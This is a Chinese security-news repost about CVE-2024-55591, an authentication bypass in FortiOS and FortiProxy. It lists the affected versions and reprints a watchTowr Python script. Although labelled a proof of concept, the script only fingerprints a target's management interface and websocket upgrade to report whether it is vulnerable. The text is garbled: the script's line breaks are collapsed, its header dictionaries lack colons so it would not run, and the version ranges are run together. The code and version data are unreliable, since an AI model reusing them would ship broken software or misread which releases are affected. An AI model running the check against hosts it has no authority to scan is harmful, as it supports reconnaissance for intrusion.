CVE-2024-55591|FortiOS和FortiProxy身份认证绕过漏洞(POC)

admin 2025年1月22日10:10:16评论48 views字数 4694阅读15分38秒阅读模式

0x00 前言

FortiOS是美国飞塔(Fortinet)公司开发的一套专用于FortiGate网络安全平台上的安全操作系统,FortiOS本身就具有多种功能,防火墙、IPSec VPN、SSL-VPN、IPS、防病毒、Web过滤、反垃圾邮件和应用控制(即时通讯和P2P),以及带宽控制。

FortiProxy是Fortinet推出的一款高性能代理产品,它结合了Web过滤、DNS过滤、DLP、反病毒、入侵防御和高级威胁保护等多种检测技术,以保护用户免受网络攻击。

0x01 漏洞描述

未经身份验证的远程攻击者可以通过向 Node.js websocket 模块发送特制请求,成功利用此漏洞可使攻击者获得超级管理员权限。

0x02 CVE编号

CVE-2024-55591

0x03 影响版本

7.0.0 <= FortiOS 7.0.* <= 7.0.167.0.0 <= FortiProxy 7.0.* <= 7.0.197.2.0 <= FortiProxy 7.2.* <= 7.2.12

0x04 漏洞详情

POC:

https://github.com/watchtowrlabs/fortios-auth-bypass-check-CVE-2024-55591

import requestsimport randomfrom uuid import uuid4from datetime import datetime, timedeltaimport argparsebanner = """             __         ___  ___________                        __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________      \ \/ \/ \__  \    ___/ ___\|  |  \\|    | /  _ \ \/ \/ \_  __ \      \     / / __ \|  | \  \\___|   Y  |    |(  <_> \     / |  | \n       \/\_/ (____  |__|  \\\___  |___|__|__  | \\__  / \/\_/  |__|                     \          \     \                                      CVE-2024-55591.py        (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) vulnerable detection by watchTowr          - Sonny , watchTowr ([email protected])          - Aliz Hammond, watchTowr ([email protected])        CVEs: [CVE-2024-55591]"""def generate_random_suffix(length=6):"""Generate a random lowercase suffix."""return''.join(random.choice('abcdefghijklmnopqrstuvwxyz'for _ in range(length))def perform_web_interaction(target, port):"""    Perform a two-step web interaction with specific parameters.    Args:        target (str): Target IP address        port (int): Target port    Returns:        tuple: Results of the two requests    """    # Construct base URL    base_url = f"https://{target}:{port}"    # Generate random suffix    random_suffix = generate_random_suffix()    # Disable SSL verification warnings    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)    # First request - login-like endpoint    first_url = f"{base_url}/login?redir=/ng"    first_response = requests.get(first_url, verify=False, timeout=10)    # Second request - endpoint with random suffix    second_url = f"{base_url}/watchTowr-{random_suffix}"    second_headers = {'Sec-WebSocket-Version''13','Sec-WebSocket-Key''thFz/fKwzu5wDEy0XO3fcw==','Connection''keep-alive, Upgrade','Upgrade''websocket'    }    second_response = requests.get(second_url, headers=second_headers, verify=False, timeout=10)return first_response, second_responsedef validate_interaction_conditions(first_response, second_response):"""    Validate specific conditions for the web interaction.    Args:        first_response (requests.Response): First HTTP response        second_response (requests.Response): Second HTTP response    Returns:        bool: Whether all conditions are met    """    try:        # Check status codes        status_code_1_check = first_response.status_code == 200        status_code_2_check = second_response.status_code == 101        # Check body contents for first response        html_main_app_check = '<html class="main-app">' in first_response.text        f_icon_warning_check = '<f-icon class="fa-warning' in first_response.text        f_icon_closing_check = '</f-icon>' in first_response.text        body_checks = html_main_app_check and f_icon_warning_check and f_icon_closing_check        # Check for specific header marker        header_marker_check = any('APSCOOKIE_' in str(header) for header in first_response.headers.values())        # Check connection upgrade for second response        connection_upgrade_check = 'Upgrade' in second_response.headers.get('Connection''')        # Print detailed information about first response matchersif not html_main_app_check:print("[!] Target is not a FortiOS Management Interface")            exit()if not f_icon_warning_check:print("[!] '<f-icon class="fa-warning"' not found in response")        # Combine all checksreturn all([            status_code_1_check,            status_code_2_check,            body_checks,            header_marker_check,            connection_upgrade_check        ])    except Exception as e:print(f"[!] Error during validation: {e}")return Falsedef main():"""    Main function to run the web interaction checks.    """print(banner)    parser = argparse.ArgumentParser(description='CVE-2024-55591 Detection Tool')    parser.add_argument('--target''-t'type=str, help='IP address of the target', required=True)    parser.add_argument('--port''-p'type=int, help='Port of the target', required=False, default=443)    args = parser.parse_args()    try:print(f"[*] Targeting: https://{args.target}:{args.port}")        first_response, second_response = perform_web_interaction(args.target, args.port)        result = validate_interaction_conditions(first_response, second_response)if result:print("[!] VULNERABLE: All conditions were met")else:print("[*] NOT VULNERABLE: Conditions were not satisfied")    except requests.RequestException as e:print(f"[!] Request error: {e}")    except Exception as e:print(f"[!] Unexpected error: {e}")if __name__ == "__main__":    main()

0x05 参考链接

https://fortiguard.fortinet.com/psirt/FG-IR-24-535

原文始发于微信公众号(信安百科):CVE-2024-55591|FortiOS和FortiProxy身份认证绕过漏洞(POC)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月22日10:10:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-55591|FortiOS和FortiProxy身份认证绕过漏洞(POC)https://cn-sec.com/archives/3644881.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息